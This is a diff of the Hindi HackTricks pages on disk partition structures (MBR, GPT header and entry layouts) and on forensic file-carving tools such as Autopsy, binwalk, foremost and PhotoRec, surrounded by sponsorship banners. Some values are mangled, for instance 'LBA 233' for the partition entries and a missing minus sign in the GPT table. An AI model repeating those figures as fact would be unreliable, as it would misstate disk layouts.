<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी हैकट्रिक्स में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details>

View file

@ -8,30 +8,30 @@
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos का सर्थन करें।
</details>
## Partitions
एक हार्ड ड्राइव या एक **SSD डिस्क में विभिन्न पार्टीशन** हो सकते हैं जिनका उद्देश्य डेटा को भौतिक रूप से अलग करना है।\
एक हार्ड ड्राइव या एक **SSD डिस्क विभिन्न पार्टीशन** शारीरिक रूप से डेटा को अलग करने के उद्देश्य से रख सकता है।\
डिस्क की **न्यूनतम** इकाई सेक्टर है (सामान्य रूप से 512B से बना होता है)। इसलिए, प्रत्येक पार्टीशन का आकार उस आकार की गुणाकार होनी चाहिए।
### MBR (मास्टर बूट रिकॉर्ड)
यह **डिस्क के पहले सेक्टर में आवंटित किया गया है 446B के बूट कोड के बाद**यह सेक्टर PC को इंडिकेट करने के लिए महत्वपूर्ण है कि क्या और कहां से पार्टीशन माउंट किया जाना चाहिए।\
इसमें **4 पार्टीशन** (अधिकतम **केवल 1** सक्रिय/**बूटेबल**) की अनुमति है। हालांकि, यदि आपको अधिक पार्टीशन की आवश्यकता है तो आप **विस्तारित पार्टीशन** का उपयोग कर सकते हैं। इस पहले सेक्टर का अंतिम बाइट बूट रिकॉर्ड सिग्नेचर **0x55AA** है। केवल एक पार्टीशन को सक्रिय चिह्नित किया जा सकता है।\
MBR **अधिकतम 2.2TB** की अनुमति देता है।
यह **डिस्क के पहले सेक्टर में आवंटित किया गया है 446B के बूट कोड के बाद**इस सेक्टर का महत्वपूर्ण है क्योंकि यह PC को बताता है कि क्या और कहाँ से पार्टीशन माउंट किया जाना चाहिए।\
इसमें **4 पार्टीशनों** की अनुमति है (अधिकतम **केवल 1** सक्रिय/**बूटेबल** हो सकती है)। हालांकि, यदि आपको अधिक पार्टीशन चाहिए हो सकता है तो आप **विस्तारित पार्टीशन** का उपयोग कर सकते हैं। इस पहले सेक्टर का अंतिम बाइट बूट रिकॉर्ड सिग्नेचर **0x55AA** है। केवल एक पार्टीशन को सक्रिय चिह्नित किया जा सकता है।\
MBR अधिकतम **2.2TB** की अनुमति देता है।
![](<../../../.gitbook/assets/image (489).png>)
![](<../../../.gitbook/assets/image (490).png>)
**बाइट्स 440 से 443** तक MBR में आप **Windows Disk Signature** (यदि Windows का उपयोग किया जाता है) पा सकते हैं। हार्ड डिस्क का तार्किक ड्राइव पत्र Windows Disk Signature पर निर्भर करता है। इस सिग्नेचर को बदलने से Windows को बूट करने से रोका जा सकता है (उपकरण: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**।
**बाइट्स 440 से 443** तक MBR में आप **Windows Disk Signature** (यदि Windows का उपयोग किया गया है) पा सकते हैं। हार्ड डिस्क का तार्किक ड्राइव पत्र Windows Disk Signature पर निर्भर करता है। इस सिग्नेचर को बदलने से Windows को बूट करने से रोका जा सकता है (उपकरण: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**।
![](<../../../.gitbook/assets/image (493).png>)
@ -53,11 +53,11 @@ MBR **अधिकतम 2.2TB** की अनुमति देता है
| 0 (0x00) | 1 (0x01) | सक्रिय ध्वज (0x80 = बूटेबल) |
| 1 (0x01) | 1 (0x01) | प्रारंभ हेड |
| 2 (0x02) | 1 (0x01) | प्रारंभ सेक्टर (बिट्स 0-5); सिलेंडर के ऊपरी बिट्स (6- 7) |
| 3 (0x03) | 1 (0x01) | प्रारंभ सिलेंडर कम से कम 8 बिट्स |
| 3 (0x03) | 1 (0x01) | प्रारंभ सिलेंडर कम से कम 8 बिट |
| 4 (0x04) | 1 (0x01) | पार्टीशन प्रकार कोड (0x83 = लिनक्स) |
| 5 (0x05) | 1 (0x01) | अंत हेड |
| 6 (0x06) | 1 (0x01) | अंत सेक्टर (बिट्स 0-5); सिलेंडर के ऊपरी बिट्स (6- 7) |
| 7 (0x07) | 1 (0x01) | अंत सिलेंडर कम से कम 8 बिट्स |
| 6 (0x06) | 1 (0x01) | अंत सेक्टर (बिट्स 0-5); सिलेंडर के ऊपरी बिट (6- 7) |
| 7 (0x07) | 1 (0x01) | अंत सिलेंडर कम से कम 8 बिट |
| 8 (0x08) | 4 (0x04) | पार्टीशन से पहले के सेक्टर (लिटिल इंडियन) |
| 12 (0x0C) | 4 (0x04) | पार्टीशन में सेक्टर |
@ -74,53 +74,58 @@ mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
```
**LBA (Logical block addressing)**
**लॉजिकल ब्लॉक पता** (**LBA**) कंप्यूटर स्टोरेज उपकरणों पर डेटा ब्लॉक की स्थान सूचित करने के लिए एक सामान्य योजना है, जो मुख्य रूप से हार्ड डिस्क ड्राइव जैसे द्वितीय स्टोरेज सिस्टम पर उपयोग की जाती है। LBA एक विशेष रैखिक पता योजना है; **ब्लॉक को एक पूर्णांक सूची द्वारा खोजा जाता है**, पहला ब्लॉक LBA 0, दूसरा LBA 1, और इसी प्रकार।
**लॉजिकल ब्लॉक पता** (**LBA**) कंप्यूटर स्टोरेज उपकरणों पर डेटा ब्लॉक की स्थान सूचित करने के लिए एक सामान्य योजना है, जो मुख्य रूप से हार्ड डिस्क ड्राइव जैसे द्वितीय स्टोरेज सिस्टम पर स्टोर किए गए डेटा ब्लॉक की स्थान सूचित करने के लिए प्रयुक्त है। LBA एक विशेष रूप से सरल रैखिक पता योजना है; **ब्लॉक को एक पूर्णांक सूची द्वारा स्थानित किया जाता है**, पहला ब्लॉक LBA 0 होता है, दूसरा LBA 1, और इसी प्रकार।
### GPT (GUID Partition Table)
इसे GUID Partition Table कहा जाता है क्योंकि आपके ड्राइव पर हर पार्टीशन का **वैश्विक अद्वितीय पहचानकर्ता** होता है।
GUID Partition Table, जिसे GPT के रूप में जाना जाता है, MBR (Master Boot Record) की तुलना में उन्नत क्षमताओं के लिए पसंद की जाती है। विभाजनों के लिए **वैश्विक अद्वितीय पहचानकर्ता** के लिए प्रसिद्ध GPT कई तरीकों में उभरता है:
MBR की तरह यह **सेक्टर 0** में शुरू होता है। MBR 32 बिट का होता है जबकि **GPT** 64 बिट का है।\
GPT **Windows में 128 पार्टीशनों** और **9.4ZB** तक की अनुमति देता है।\
इसके अलावा, पार्टीशनों के पास 36 वर्णों का यूनिकोड नाम हो सकता है।
- **स्थान और आकार**: GPT और MBR दोनों **सेक्टर 0** से प्रारंभ होते हैं। हालांकि, GPT **64 बिट** पर काम करता है, जो MBR के 32 बिट के विपरीत है।
- **विभाजन सीमाएं**: GPT विंडोज सिस्टम पर **128 विभाजन** तक समर्थन प्रदान करता है और **9.4ZB** तक के डेटा को समर्थन करता है।
- **विभाजन नाम**: 36 यूनिकोड वर्णों के साथ विभाजनों को नाम देने की क्षमता प्रदान करता है।
MBR डिस्क पर, पार्टीशनिंग और बूट डेटा एक ही स्थान में स्टोर होते हैं। अगर यह डेटा ओवरराइट या करप्ट हो जाता है, तो आप मुश्किल में पड़ सकते हैं। विपरीत, **GPT डिस्क पर इस डेटा के कई प्रतियां** स्टोर होती हैं, इसलिए यह बहुत अधिक मजबूत है और यदि डेटा करप्ट हो जाता है तो उसे डिस्क पर दूसरे स्थान से **पुनर्स्थापित करने का प्रयास** कर सकता है।
**डेटा सहायता और पुनर्प्राप्ति**:
GPT अपने डेटा की सुरक्षा के लिए **साइक्लिक रेडंडेंसी चेक (CRC)** मानों को स्टोर करता है। यदि डेटा करप्ट हो जाता है, तो GPT समस्या को नोटिस कर सकता है और डिस्क पर दूसरे स्थान से **क्षतिग्रस्त डेटा को पुनर्स्थापित करने का प्रयास** कर सकता है।
- **पुनर्निर्देशन**: MBR की तुलना में, GPT विभाजन और बूट डेटा को एक ही स्थान पर सीमित नहीं करता है। यह डेटा को डिस्क पर फैलाता है, जिससे डेटा की अखंडता और सहायता मजबूत होती है।
- **साइक्लिक रीडंडेंसी चेक (CRC)**: GPT डेटा अखंडता सुनिश्चित करने के लिए CRC का उपयोग करता है। यह डेटा के कोरप्ट होने की गतिविधि के लिए सक्रिय रूप से मॉनिटर करता है, और जब इसे पता चलता है, तो GPT को दूसरे डिस्क स्थान से कोरप्ट हुए डेटा को पुनर्प्राप्त करने का प्रयास करता है।
**प्रोटेक्टिव MBR (LBA0)**
**सुरक्षित MBR (LBA0)**:
पुरानी वापसी के लिए, पुराने MBR का जगह GPT विनिर्देश में अभी भी सुरक्षित रखा गया है, लेकिन यह अब एक ऐसे **तरीके से उपयोग किया जाता है जो MBR आधारित डिस्क उपयोगकर्ताओं को गलत समझने और संभावित रूप से GPT डिस्क को ओवरराइट करने से रोकता है**। इसे प्रोटेक्टिव MBR के रूप में संदर्भित किया जाता है।
- GPT पुराने MBR परिसर में सुरक्षित MBR के माध्यम से पिछले संगतता को बनाए रखता है। यह सुविधा विभाजित GPT डिस्कों पर डेटा अखंडता की सुरक्षा करने के लिए गलती से GPT डिस्क को ओवरराइट करने से बचाती है, इसलिए GPT-स्वरूपित डिस्क पर डेटा अखंडता की सुरक्षा करती है।
![](<../../../.gitbook/assets/image (491).png>)
![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../.gitbook/assets/image (491).png>)
**हाइब्रिड MBR (LBA 0 + GPT)**
ऑपरेटिंग सिस्टम में जो **BIOS के माध्यम से GPT आधारित बूट** का समर्थन करते हैं, पहला सेक्टर भी **बूटलोडर** कोड को स्टोर करने के लिए उपयोग किया जा सकता है, लेकिन **संशोधित** करके **GPT पार्टीशनों** को पहचानने के लिए। MBR में बूटलोडर को 512 बाइट का सेक्टर आकार मानना नहीं चाहिए।
[Wikipedia से](https://en.wikipedia.org/wiki/GUID_Partition_Table)
**पार्टीशन तालिका हेडर (LBA 1)**
जो ऑपरेटिंग सिस्टम GPT-आधारित बूट के माध्यम से BIOS सेवाएं का समर्थन करते हैं, पहला सेक्टर आमतौर पर **बूटलोडर** कोड का पहला चरण स्टोर करने के लिए भी उपयोग किया जा सकता है, लेकिन **संशोधित** करके **GPT विभाजनों** को पहचानने के लिए। MBR में बूटलोडर को 512 बाइट के सेक्टर का आधार मानना नहीं चाहिए।
पार्टीशन तालिका हेडर डिस्क पर उपयोग के ब्लॉक को परिभाषित करता है। यह भी पार्टीशन तालिका का हिस्सा बनाने वाले पार्टीशन प्रविष्टियों की संख्या और आकार को परिभाषित करता है (तालिका में ऑफसेट 80 और 84)।
**विभाजन सारणी हेडर (LBA 1)**
[Wikipedia से](https://en.wikipedia.org/wiki/GUID_Partition_Table)
विभाजन सारणी हेडर डिस्क पर उपयोगी ब्लॉकों को परिभाषित करता है। यह भी विभाजन सारणी का हिस्सा बनाने वाले विभाजन प्रविष्टियों की संख्या और आकार को परिभाषित करता है (टेबल में 80 और 84 का ऑफसेट)।
| ऑफसेट | लंबाई | सामग्री |
| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 बाइट | हस्ताक्षर ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h या 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)लिटिल-एंडियन मशीनों पर) |
| 8 (0x08) | 4 बाइट | संशोधन 1.0 (00h 00h 01h 00h) UEFI 2.8 के लिए |
| 12 (0x0C) | 4 बाइट | हेडर साइज लिटिल एंडियन में (बाइट में, सामान्यत: 5Ch 00h 00h 00h या 92 बाइट) |
| 16 (0x10) | 4 बाइट | [CRC32](https://en.wikipedia.org/wiki/CRC32) हेडर का (ऑफसेट +0 से हेडर साइज तक) हेडर का लिटिल एंडियन में, जिसमें इस क्षेत्र को हिसाब से शून्य किया जाता है। |
| 20 (0x14) | 4 बाइट | रिजर्व्ड; शून्य होना चाहिए |
| 24 (0x18) | 8 बाइट | वर्तमान LBA (इस हेडर कॉपी क स्थान) |
| 32 (0x20) | 8 बाइट | बैकअप LBA (दूसरे हेडर की कॉपी क स्थान) |
| 40 (0x28) | 8 बाइट | पार्टीशनों के लिए पहला उपयोगी LBA (प्राथमिक पार्टीशन तालिका का अंतिम LBA + 1) |
| 48 (0x30) | 8 बाइट | अंतिम उपयोगी LBA (द्वितीय पार्टीशन तालिका का पहला LBA 1) |
| 8 (0x08) | 4 बाइट | संशोधन 1.0 (00h 00h 01h 00h) यूईएफआई 2.8 के लिए |
| 12 (0x0C) | 4 बाइट | हेडर का आकार लिटिल एंडियन में (बाइट में, सामान्यत: 5Ch 00h 00h 00h या 92 बाइट) |
| 16 (0x10) | 4 बाइट | [CRC32](https://en.wikipedia.org/wiki/CRC32) हेडर का (ऑफसेट +0 से हेडर का आकार तक) लिटिल एंडियन में, जिसमें इस क्षेत्र को हिसाब से शून्य किया जाता है। |
| 20 (0x14) | 4 बाइट | आरक्षित; शून्य होना चाहिए |
| 24 (0x18) | 8 बाइट | वर्तमान LBA (इस हेडर कॉपी क स्थान) |
| 32 (0x20) | 8 बाइट | बैकअप LBA (दूसरे हेडर की कॉपी क स्थान) |
| 40 (0x28) | 8 बाइट | विभाजनों के लिए पहला उपयोगी LBA (प्राथमिक विभाजन सारणी का अंतिम LBA + 1) |
| 48 (0x30) | 8 बाइट | अंतिम उपयोगी LBA (द्वितीय विभाजन सारणी का पहला LBA 1) |
| 56 (0x38) | 16 बाइट | डिस्क GUID मिक्स्ड एंडियन में |
| 72 (0x48) | 8 बाइट | पार्टीशन प्रविष्टियों के एक एरे की प्रारंभिक LBA (हमेशा प्राथमिक कॉपी में 2) |
| 80 (0x50) | 4 बाइट | एरे में पार्टीशन प्रविष्टियों की संख्या |
| 84 (0x54) | 4 बाइट | एकल पार्टीशन प्रविष्टि का आकार (सामान्यत: 80h या 128) |
| 88 (0x58) | 4 बाइट | पार्टीशन प्रविष्टियों एरे का CRC32 लिटिल एंडियन में |
| 92 (0x5C) | \* | रिजर्व्ड; बाकी ब्लॉक के लिए शून्य होना चाहिए (512 बाइट के सेक्टर आकार के लिए 420 बाइट; लेकिन अधिक बड़े सेक्टर आकार के साथ अधिक हो सकता है) |
| 88 (0x58) | 4 बाइट | पार्टीशन प्रविष्टियों के एरे का CRC32 लिटिल एंडियन में |
| 92 (0x5C) | \* | आरक्षित; बाकी ब्लॉक के लिए शून्य होना चाहिए (512 बाइट के सेक्टर के लिए 420 बाइट; लेकिन अधिक बड़े सेक्टर के साथ अधिक हो सकता है) |
**पार्टीशन प्रविष्टियाँ (LBA 233)**
**विभाजन प्रविष्टियाँ (LBA 233)**
| GUID पार्टीशन प्रविष्टि प्रारूप | | |
| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
@ -129,19 +134,15 @@ GPT अपने डेटा की सुरक्षा के लिए **
| 16 (0x10) | 16 बाइट | अद्वितीय पार्टीशन GUID (मिक्स्ड एंडियन) |
| 32 (0x20) | 8 बाइट | पहला LBA ([लिटिल एंडियन](https://en.wikipedia.org/wiki/Little\_endian)) |
| 40 (0x28) | 8 बाइट | अंतिम LBA (समावेशी, सामान्यत: विषम) |
| 48 (0x30) | 8 बाइट | विशेषता ध्वज (उदाहरण के लिए बिट 60 पढ़ने योग्य दर्शाता है) |
| 48 (0x30) | 8 बाइट | विशेषता ध्वज (उदाहरण के लिए बिट 60 पढ़ने योग्यता की निशानी है) |
| 56 (0x38) | 72 बाइट | पार्टीशन नाम (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE कोड इकाइयाँ) |
**पार्टीशन प्रकार**
**विभाजन प्रकार**
![](<../../../.gitbook/assets/image (492).png>)
[https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) में अधिक पार्टीशन प्रकार।
[https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) में अधिक विभाजन प्रकार।
### जांच
[**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) के साथ फोरेंसिक्स इमेज को माउंट करने के बाद, आप [**Active Disk Editor**](https://www.disk-editor.org/index.html) जैसे Windows टूल का उपयोग करके पहले सेक्टर की जांच कर सकते हैं। निम्नलिखित छवि में एक **MBR** को **सेक्टर 0** पर पहचाना गया था और इसे व्याख्या की गई थी:
![](<../../../.gitbook/assets/image (494).png>)
अगर यह एक **MBR की बजाय एक GPT तालिका** होती, तो **सेक्टर 1** में हस्ताक
[**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) के साथ फोरेंसिक्स इमेज को माउंट करने के बाद, आप [**Active Disk Editor**](https://www.disk-editor.org/index.html) जैसे विंडोज उपकरण का उपयोग क

View file

@ -4,11 +4,11 @@
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
@ -26,13 +26,13 @@ HackTricks का समर्थन करने के अन्य तरी
## Autopsy
छवियों से फ़ाइलें निकालने के लिए ज्यादा प्रयोग किया जाने वाला टूल है [**Autopsy**](https://www.autopsy.com/download/)। इसे डाउनलोड करें, इंस्टॉल करें और फ़ाइल को इंजेस्ट करने के लिए इसे खोजें "छिपी" फ़ाइलें। ध्यान दें कि Autopsy डिस्क छवियों और अन्य प्रकार की छवियों का समर्थन करने के लिए बनाया गया है, लेकिन साध फ़ाइलों का नहीं।
छवियों से फ़ाइलें निकालने के लिए ज्यादा प्रयोग किया जाने वाला टूल है [**Autopsy**](https://www.autopsy.com/download/)। इसे डाउनलोड करें, इंस्टॉल करें और फ़ाइल को इंजेस्ट करने के लिए इसे बनाएं "छिपी" फ़ाइलें खोजने के लिए। ध्यान दें कि Autopsy को डिस्क छवियों और अन्य प्रकार की छवियों का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का नहीं।
## Binwalk <a href="#binwalk" id="binwalk"></a>
**Binwalk** एक टूल है जो इमेजेस और ऑडियो फ़ाइल्स जैसे बाइनरी फ़ाइलों को खोजने और डेटा के लिए एम्बेडेड फ़ाइलों के लिए है।\
इसे `apt` के साथ इंस्टॉल किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर मिल सकता है।\
**उपयोगी कमांड्स**:
**Binwalk** एक टूल है जो बाइनरी फ़ाइलों का विश्लेषण करने के लिए है जिसमें एम्बेडेड सामग्री खोजने के लिए है। इसे `apt` के माध्यम से स्थापित किया जा सकता है और इसका स्रोत [GitHub](https://github.com/ReFirmLabs/binwalk) पर है।
**उपयोगी कमांड**:
```bash
sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file
@ -41,7 +41,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
छिपी हुई फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलों की खोज करना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यसित फ़ाइल प्रकारों के लिए खोज करेगा।
छिपे हुए फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost की विन्यास फ़ाइल को `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलों के लिए खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यसत फ़ाइल प्रकारों के लिए खोजेगा।
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
@ -62,50 +62,50 @@ scalpel file.img -o output
```
bulk_extractor memory.img -o out_folder
```
**उस सी जानकारी** में नेविगेट करें जो टूल ने इकट्ठा की है (पासवर्ड?), **पैकेट्स** का **विश्लेषण** करें (पढ़ें[ **Pcaps विश्लेषण**](../pcap-inspection/)), **अजीब डोमेन** (मैलवेयर से संबंधित या **अस्तित्वहीन**) की खोज करें।
**उस सारी जानकारी** में नेविगेट करें जो टूल ने इकट्ठा की है (पासवर्ड?), **पैकेट** का **विश्लेषण** करें (पढ़ें[ **Pcaps विश्लेषण**](../pcap-inspection/)), **अजीब डोमेन** (मैलवेयर से संबंधित या **अस्तित्वहीन**) की खोज करें।
## PhotoRec
आप इसे [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download) में पा सकते हैं।
यह GUI और CLI संस्करणों के साथ आता है। आप चुन सकते हैं **फ़ाइल-प्रकार** जिनकी खोज के लिए PhotoRec को।
यह GUI और CLI संस्करणों के साथ आता है। आप फाइल-प्रकार चुन सकते हैं जिनकी खोज के लिए PhotoRec को।
![](<../../../.gitbook/assets/image (524).png>)
## binvis
कोड की जाँच करें [यहाँ](https://code.google.com/archive/p/binvis/) और [वेब पेज टूल](https://binvis.io/#/)।
कोड की [जाँच](https://code.google.com/archive/p/binvis/) और [वेब पेज टूल](https://binvis.io/#/) करें
### BinVis की विशेषताएँ
* दृश्यात्मक और सक्रिय **संरचना दर्शक**
* विभिन्न फोकस बिंदुओं के लिए एकाधिक चित्र
* विभिन्न ध्यान स्थानों के लिए एकाधिक चित्र
* एक नमूने के भागों पर ध्यान केंद्रित करना
* **स्ट्रिंग्स और संसाधनों** को देखना, PE या ELF कार्यक्रमों में जैसे
* फ़ाइलों पर क्रिप्टनालिसिस के लिए **पैटर्न** प्राप्त करना
* पैकर या इन्कोडर एल्गोरिदम क**स्पॉट** करना
* **PE या ELF एक्जीक्यूटेबल्स** में स्ट्रिंग और संसाधन देखना, जैसे कि
* फ़ाइलों पर क्रिप्टोएनालिसिस के लिए **पैटर्न** प्राप्त करना
* पैकर या इन्कोडर एल्गोरिदम क**पहचान** करना
* पैटर्न द्वारा स्टेगेनोग्राफी की **पहचान** करना
* **दृश्यात्मक** बाइनरी-डिफिंग
BinVis एक महान **शुरुआती बिंदु है** जिससे आप एक अज्ञात लक्ष्य के साथ परिचित हो सकते हैं एक ब्लैक-बॉक्सिंग स्थिति में।
BinVis एक अज्ञात लक्ष्य के साथ परिचित होने के लिए एक महान **आरंभ-बिंदु** है एक काल-बॉक्सिंग स्थिति में।
# विशेष डेटा कार्विंग टूल
## FindAES
AES कुंजियों की खोज करने के लिए उनके कुंजी अनुसूचियों की खोज करके FindAES खोजता है। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे कि TrueCrypt और BitLocker द्वारा उपयोग की गई कुंजियाँ
अपने की स्केज्यूल्स की खोज करके AES कुंजियों की खोज करता है। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे कि जो TrueCrypt और BitLocker द्वारा उपयोग की जाती हैं
यहाँ से डाउनलोड करें (https://sourceforge.net/projects/findaes/).
# पूरक टूल
आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं ताकि आप छवियों को टर्मिनल से देख सकें।\
आप लिनक्स कमांड लाइन टूल **pdftotext** का उपयोग कर हैं ताकि आप एक पीडीएफ को पाठ में परिवर्तित कर सकें और इसे पढ़ सकें।
आप [**viu** ](https://github.com/atanunq/viu)का उपयोग करके छवियों को देखने के लिए कर सकते हैं।\
आप लिनक्स कमांड लाइन टूल **pdftotext** का उपयोग करके एक पीडीएफ को पाठ में परिवर्तित करने और इसे पढ़ने के लिए कर सकते हैं।
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
उन वंशावलियताओं को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरे तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक के मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
जो सबसे अधिक महत्वपूर्ण संकटों को खोजें ताकि आप उन्हें जल्दी ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरे तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम्स तक के मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -115,10 +115,10 @@ AES कुंजियों की खोज करने के लिए उ
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks** को **PDF** में डाउनलोड करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
